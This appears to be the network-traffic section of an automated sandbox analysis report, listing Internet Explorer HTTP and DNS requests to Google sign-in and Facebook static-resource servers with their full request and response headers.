                                                                                              GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Frame-Options: DENY
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
                                                                                              x-ua-compatible: IE=edge
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: script-src 'nonce-yLgtuYCvawIlGu6y9hN52w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                                                              Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/favicon.ico
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /favicon.ico HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6
                                                                                              Response
                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: DENY
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Location: https://www.google.com/favicon.ico
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: script-src 'nonce-gpCmiaZhUQdKE7Pk2B-UNA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                              Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                              Content-Encoding: gzip
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Server: GSE
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              POST
                                                                                              https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-5637080031081470389&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=45986&rt=c
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              POST /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-5637080031081470389&bl=boq_identityfrontendauthuiserver_20231015.08_p1&hl=en-US&_reqid=45986&rt=c HTTP/1.1
                                                                                              Accept: */*
                                                                                              X-Same-Domain: 1
                                                                                              x-goog-ext-278367001-jspb: ["GlifWebSignIn"]
                                                                                              x-goog-ext-391502476-jspb: ["S-938975925:1698151584909921",null,null,"AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ"]
                                                                                              Content-Type: application/x-www-form-urlencoded;charset=utf-8
                                                                                              Referer: https://accounts.google.com/v3/signin/
                                                                                              Accept-Language: en-US
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: accounts.google.com
                                                                                              Content-Length: 165
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6; OTZ=7264126_56_56__56_
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: application/json; charset=utf-8
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              Set-Cookie: __Host-GAPS=1:yJva5d_91Rl18o8LS2Agto8vuXCPaA:_4T_em5OQdL1SBej; Expires=Thu, 23-Oct-2025 12:46:27 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:27 GMT
                                                                                              Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                                                              Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/generate_204?bWkyBQ
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /generate_204?bWkyBQ HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:yJva5d_91Rl18o8LS2Agto8vuXCPaA:_4T_em5OQdL1SBej; OTZ=7264126_56_56__56_
                                                                                              Response
                                                                                              HTTP/1.1 204 No Content
                                                                                              Content-Length: 0
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Date: Tue, 24 Oct 2023 12:46:27 GMT
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://accounts.google.com/_/bscframe
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              142.250.179.141:443
                                                                                              Request
                                                                                              GET /_/bscframe HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, */*
                                                                                              Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyMxAAUkQcBgxT8oKYLaTpqquFKlgCf1BXOhgEJwGMa8ccXhJvx5CzR7HyNkABFHUWZTToLxQ&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-938975925%3A1698151584909921&theme=glif
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: accounts.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: __Host-GAPS=1:YyWD7qWpRvpvslJRRPC_C_bgglB5Dg:sq_SjoC0zbU_H7n6; OTZ=7264126_56_56__56_
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Tue, 24 Oct 2023 12:46:27 GMT
                                                                                              Content-Security-Policy: script-src 'unsafe-eval';require-trusted-types-for 'script';object-src 'none'
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInSignUpUi"
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Report-To: {"group":"AccountsSignInSignUpUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInSignUpUi"}]}
                                                                                              Content-Encoding: gzip
                                                                                              Server: ESF
                                                                                              X-XSS-Protection: 0
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Transfer-Encoding: chunked
                                                                                            • flag-us
                                                                                              DNS
                                                                                              static.xx.fbcdn.net
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              static.xx.fbcdn.net
                                                                                              IN A
                                                                                              Response
                                                                                              static.xx.fbcdn.net
                                                                                              IN CNAME
                                                                                              scontent.xx.fbcdn.net
                                                                                              scontent.xx.fbcdn.net
                                                                                              IN A
                                                                                              157.240.201.15
                                                                                            • flag-us
                                                                                              DNS
                                                                                              facebook.com
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              facebook.com
                                                                                              IN A
                                                                                              Response
                                                                                              facebook.com
                                                                                              IN A
                                                                                              157.240.201.35
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/eMLccrbY7PY.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/ym/l/0,cross/eMLccrbY7PY.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 18:59:19 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: Y0qqH/3yJXEouKdzrj6j+w==
                                                                                              X-FB-Debug: aPLRor2noVPMwDYNJ94naSu5HGJ6Na9UrFfA9ufir66I7hReDVELTVQ/1woD4oVygd3+Odq3JXEWYprO2yISyQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1290
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1
                                                                                              Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: image/svg+xml
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 23:10:42 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 7LTAFoD2FIsnNV1/7L5XgQ==
                                                                                              X-FB-Debug: RCDK1+C700e2JV8Yx5QO/SWRId5GItq2I7VkrZf8nmm7qjRVHWy652bOCRYH4/zmASVqRvzJsGCNCd8I+Z1rLQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 986
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/HNgzzBeIHFV.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y-/r/HNgzzBeIHFV.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 18:04:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: QqK2F/4TZZGN65LebgVE+w==
                                                                                              X-FB-Debug: XcYm15fLt6KLFU1NpNn04KFsQaGouxUTDDpyAVptKf6QBRyGI39St9f23ME9qd84ABANbOt0J/moBSgxzqeVTw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 3604
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/wm4d5zAAo-a.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yw/r/wm4d5zAAo-a.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 11 Oct 2024 18:48:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: Y3FIudc+QOGAM5/fAOGwZA==
                                                                                              X-FB-Debug: mol1LgPuwbF7Qn/P7IYGOAP9XFWYbyDjPxosMuAUeXYY/XI4K8c9AdvGDhy3rwCfoKl7b61qfHYB1KWdPwauDQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1224
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/nUaWn-aYGoP.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yF/r/nUaWn-aYGoP.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 22:07:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: zS3BioABqg2VsWCNKAiy7w==
                                                                                              X-FB-Debug: vS0FHIHMiDD/baS5GZO4etS7iJbcLrWNUX9G9APe/9u00WORL9ng3ftHfgS40K6dHqXNLS15mUpDtjuLUzuChQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 11142
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/5tYv3Fgg2PJ.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yI/r/5tYv3Fgg2PJ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 18 Oct 2024 17:27:21 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: BmMgTkGiKo1a1Oh0B3B+cA==
                                                                                              X-FB-Debug: W1hrHFzWYRhXN2AyxP9X0Ge7F92W9Hnkj9yCr9jFz8o6xaEFlQIn3H+k8ZokGAVlsJebH0EbEoXt258OdIEQpg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 367
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/bisOS4dl-mS.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yP/r/bisOS4dl-mS.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 18 Oct 2024 00:02:35 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: A80zRLkAsB9bYL4eYA7WxQ==
                                                                                              X-FB-Debug: oZnwCqYI3jml1E4nIuSSx2IoYRUh0iEo9k2G4zw2ModZUSFCkUeXoWifb1RF9YQJQulqrLx8xl1y7aFfeXB1uw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 9812
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sat, 19 Oct 2024 17:53:48 GMT
